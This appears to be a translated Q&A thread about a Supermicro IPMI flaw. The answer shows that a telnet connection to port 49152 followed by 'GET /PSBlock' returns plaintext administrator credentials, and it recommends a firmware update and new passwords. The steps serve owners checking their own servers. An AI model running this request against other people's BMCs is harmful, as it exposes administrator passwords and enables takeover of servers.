如何通过网络检查我的 Supermicro IPMI 是否被纯文本管理员密码泄露?

Vin*_*rão 10 password ipmi exploit supermicro

我有一些运行 IPMI 的 Supermicro 服务器,如本博客中所述(http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some- added-extras)有一个严重的漏洞从任何远程位置获取明文管理员密码。

如何检查我的服务器主板是否已损坏?

Vin*_*rão 13

只需 telnet 到端口 49152 中的 IPMI IP 地址并执行特定的 GET 请求。如果您遭到入侵,您应该获取您的用户和密码。

telnet server.example.com 49152
Run Code Online (Sandbox Code Playgroud)

连接请求GET /PSBlock并查看结果后,应该是这样的:

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Run Code Online (Sandbox Code Playgroud)

回答:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Run Code Online (Sandbox Code Playgroud)

要解决此问题,请将 IPMI 固件更新到最新版本。固件特定于您的 IPMI 控制器,因此您应该在 Supermicro 网站上获取指定的固件。

然后在更新固件后更改您的密码